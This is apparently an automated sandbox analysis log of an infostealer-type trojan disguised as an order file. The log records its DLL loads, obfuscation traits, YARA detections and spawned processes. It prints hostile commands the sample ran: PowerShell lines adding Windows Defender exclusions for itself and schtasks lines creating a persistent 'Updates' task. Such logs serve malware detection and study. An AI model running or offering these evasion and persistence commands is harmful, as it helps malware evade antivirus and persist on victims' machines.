                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: vaultcli.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: edputil.dll
                        Source: Order 19A20060.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0.2.Order 19A20060.exe.44d8f00.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Order 19A20060.exe.4513b20.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 8.2.Order 19A20060.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: Order 19A20060.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: SgJzugoOJvLgL.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.Order 19A20060.exe.7a40000.14.raw.unpack, fJ.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, UyDMxsd3t.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, 86A7K.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, vztq.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, B80ITW1.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, uQSn7t.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, bEoUgRL.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, Dg1qrk6E.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, Dg1qrk6E.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, LaZPtv2pWN66FdMorM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, U5QFouQCkrB4Z0KQFC.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, LaZPtv2pWN66FdMorM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/15@2/2
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMutant created: \Sessions\1\BaseNamedObjects\xHFdADdvLwuntDPGiwacgvoUIb
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile created: C:\Users\user\AppData\Local\Temp\tmp514A.tmpJump to behavior
                        Source: Order 19A20060.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Order 19A20060.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Order 19A20060.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Order 19A20060.exeReversingLabs: Detection: 68%
                        Source: Order 19A20060.exeVirustotal: Detection: 37%
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile read: C:\Users\user\Desktop\Order 19A20060.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Order 19A20060.exe C:\Users\user\Desktop\Order 19A20060.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Users\user\Desktop\Order 19A20060.exe C:\Users\user\Desktop\Order 19A20060.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmpJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Users\user\Desktop\Order 19A20060.exe C:\Users\user\Desktop\Order 19A20060.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\Order 19A20060.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: Order 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Order 19A20060.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Order 19A20060.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: TBIu.pdbSHA2569 source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr
                        Source: Binary string: TBIu.pdb source: Order 19A20060.exe, SgJzugoOJvLgL.exe.0.dr

                        Data Obfuscation

                        barindex
                        Source: 0.2.Order 19A20060.exe.7a40000.14.raw.unpack, fJ.cs.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
                        Source: Order 19A20060.exe, Login.cs.Net Code: InitializeComponent contains xor as well as GetObject
                        Source: SgJzugoOJvLgL.exe.0.dr, Login.cs.Net Code: InitializeComponent contains xor as well as GetObject
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, U5QFouQCkrB4Z0KQFC.cs.Net Code: mVmkVbjVmD System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.Order 19A20060.exe.4555520.9.raw.unpack, U5QFouQCkrB4Z0KQFC.cs.Net Code: mVmkVbjVmD System.Reflection.Assembly.Load(byte[])
                        Source: Order 19A20060.exeStatic PE information: 0xC0ACD5FF [Tue Jun 7 19:14:07 2072 UTC]
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A30799 push ss; iretd 0_2_07A3079A
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A307E3 push ss; iretd 0_2_07A307EA
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A307E0 push ss; iretd 0_2_07A307E2
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A33CCB push eax; iretd 0_2_07A33CCE
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A348B7 pushad ; ret 0_2_07A348BE
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A34881 pushfd ; ret 0_2_07A34882
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A30819 push ss; iretd 0_2_07A3081A
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A830B8 push esp; iretd 0_2_07A830B9
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_013D0C3D push edi; ret 8_2_013D0CC2
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_05683CCB push eax; iretd 9_2_05683CCE
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056848B7 pushad ; ret 9_2_056848BE
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_05684881 pushfd ; ret 9_2_05684882
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056D30B8 push esp; iretd 9_2_056D30B9
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_02940C3D push edi; ret 15_2_02940CC2
                        Source: Order 19A20060.exeStatic PE information: section name: .text entropy: 7.974500592117059
                        Source: SgJzugoOJvLgL.exe.0.drStatic PE information: section name: .text entropy: 7.974500592117059
                        Source: 0.2.Order 19A20060.exe.7a40000.14.raw.unpack, fJ.csHigh entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, edBmslGXvQJGNrkwfA.csHigh entropy of concatenated method names: 'Rk4KREGWZe', 'xd0K4E5N7e', 'uFnKIEIgMZ', 'QSLKxDV1JZ', 'jxDKWLQ7mM', 'bw2K3MheMQ', 'pM6KnEa1kH', 'Wx6KCLhEcc', 'z1NKGMBnDa', 'VZLKLE42uH'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, hnSKDgPdxxREZ6uQuW.csHigh entropy of concatenated method names: 'Lb1K6EEUtG', 'XiTKwAXnry', 'kowKvXLaix', 'o2QKA03ALA', 'wIYKS8mOSy', 'x81KlvE3rB', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, NHB3Ex1kT7YT8HRPfM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kcNmg9BH17', 'y8rmD6wViK', 'vc7mzAlsFL', 'hesO5feMWN', 'rJgOa9gdjU', 'iZPOmwtEm2', 'iAIOOridGD', 'eMjAI8OBbaCIiSHkOi7'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, fAVKuvuFTK59FdWbkg.csHigh entropy of concatenated method names: 'BMeWHdyW6K', 'pMhW4x0yG8', 'vCKWxpdHbF', 'OiGW3Oqu2V', 'J3bWnd0tds', 'hCAxNRlewC', 'GmAx9Ubv1B', 'QFqxMpsDsm', 'WZJx21gmJm', 'tnwxgPGaH3'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, Fk1LKsKMFn2wWBa1gds.csHigh entropy of concatenated method names: 'qxSj0ZSWhT', 'iI7jZdlUlQ', 'xNMjVL3ANc', 'ah0jBHfhEm', 'BWMjPDMHXM', 'yAjjJW8WSm', 'O2RjQFiEao', 'iXbjFIPvKA', 'kUQjb9Mg3R', 'pj6jUagLDs'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, iJCoYiaJAT8kNOyDMw.csHigh entropy of concatenated method names: 'BEZyFV6ScL', 'dLKybZiHOT', 'vyPy6OUYUY', 'Jg3yw5O6X3', 'FaEyAIcTec', 'p4Qyl68ppP', 'oxNyrxHktm', 'KlWypTn8mg', 'njSyhBuqpK', 'Fh2yfhFwEc'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, NVCjVwCBo2qT0rJYOq.csHigh entropy of concatenated method names: 'N7VxP8Tefe', 'yQjxQYEvny', 'faBIvjOXXS', 'y7qIANWBLE', 'hyLIllW1Sb', 'DjwIXeU355', 'oowIrlkBci', 'zdSIp5fCxP', 'GPkI1K0E8Y', 'wYfIhOno5M'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, PLYi7NqDAj7tKXD9fM.csHigh entropy of concatenated method names: 'uYI30U1XL6', 'UE53Z25NTl', 'kew3VUHn4l', 'fc13B4iLE4', 'yaY3PlyYCI', 'kqp3JQ3pfM', 'KlV3QVGpO4', 'f203FEJpvn', 'v923bQNrff', 'ADJ3Ulwbll'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, dhgBtnNpaPi78GpYtK.csHigh entropy of concatenated method names: 'Dispose', 'Y8AagaCoEr', 'FjVmwuMcX6', 'yt8YYyYMUN', 'axuaDaxfXr', 'CNZazh7suP', 'ProcessDialogKey', 'I5hm5HmRAm', 'zHnmaTQa4I', 'MvFmmlXgDb'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, SbQEYZeNKpsZUcDnfO.csHigh entropy of concatenated method names: 'b97a34YDso', 'm5danEjfAM', 'uYxaG044iN', 'OdoaLZ0yl5', 'BpIa89fCFB', 'dssasOFmsc', 'kcae0nS6LXh3Y8F0ND', 'Lwua5pbfBxoU5uivQW', 'YwPaa5Pfe8', 'uNhaOZ2yrW'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, OFjfvMK318xsG41tlLV.csHigh entropy of concatenated method names: 'iVKq0mdLyk', 'RHGqZ9utmA', 'pRaqV4UHjp', 'IlQCiFyxbf4oN5yOF61', 'WmYlW7yhkg6UhCUXq0Z', 'cwdREmyalhF6cKPwnS8', 'YnMlBwyG3PGd60ZTbVH'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, LaZPtv2pWN66FdMorM.csHigh entropy of concatenated method names: 'egM4Sh0qFP', 'Gfx4Twirgs', 'MK24eFtDLs', 'SlD4ECpHme', 'Huy4NlLAY9', 'oFx49yNpno', 'S014MrQ4eh', 'ouV42kg2Un', 'GWW4g73vcL', 'B0G4D02TV6'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, U5QFouQCkrB4Z0KQFC.csHigh entropy of concatenated method names: 'AePOHZyd4i', 'gRKORSLv2e', 'teBO4rikg7', 'EaGOI7W0bf', 'OTbOxPYDHi', 'zKPOWoaYm7', 'mdvO3qer9v', 'sAVOngnild', 'er1OCR2RuK', 'GXSOG2Z7aK'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, yYvJGqUhfFf5jWgkiM.csHigh entropy of concatenated method names: 'UFPIBfdKxG', 'FqqIJnZvTe', 'v1XIF3t4Nn', 'QjlIbTWpC8', 'suPI8D7g7L', 'fjpIss9B9u', 'MXTI7Rh4j0', 'piZIKg6Lwj', 'QKeIjFaKAe', 'q0CIqWNNrl'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, ENxRiUKwBLEuVCntRbw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mqrqSu1DR9', 'fsEqTrfoWk', 'QHVqecmpHj', 'KpfqEsgC86', 'kpwqNaSpP6', 'mSPq9da2eF', 'Bb1qMug8SV'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, H87RftrjGG8r2FvNBF.csHigh entropy of concatenated method names: 'r1RjacZnWC', 'feOjOJvVEx', 'dVQjkMgOb2', 'L8CjR6yFMO', 'rVhj4IeBbp', 'jGsjxopWHy', 'RuhjWBIsos', 'oyaKMqcfUd', 'bT0K2SXVbr', 'rQ3KgrNoSq'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, Vg5x4uBd0QJ3iVm1AV.csHigh entropy of concatenated method names: 'KEj7GHR4kO', 'gPd7LkofjD', 'ToString', 'qiI7Rsr2wA', 'BDn74Vxnfl', 'cke7Iq1P6o', 'aEo7xYK3vO', 'xF97W9QwBA', 'B7r73Ixpyx', 'kCq7nprQWN'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, QXW51sL4EjyLUYOJjf.csHigh entropy of concatenated method names: 'ToString', 'StRsfBXadc', 'sCXswwAdZH', 'z5GsvZ6Kmp', 'pwMsASq2Pg', 'oraslBX3fU', 'CVLsXNTK89', 'tccsreZTaC', 'oBSspMGRu9', 'mlns1oXf2O'
                        Source: 0.2.Order 19A20060.exe.7f80000.15.raw.unpack, s8RL864bc3Zg1rQIYm.csHigh entropy of concatenated method names: 'Emb3RUPpSi', 'u4r3IlnetD', 'CtF3Wm7eFA', 'LZ1WDNNQYw', 'fGAWzUuOw4', 'lgB35XgPur', 'VUS3aRg7s7', 'NSk3mmZHqF', 'jNT3OVAoSN', 'o2Q3kUMEwC'
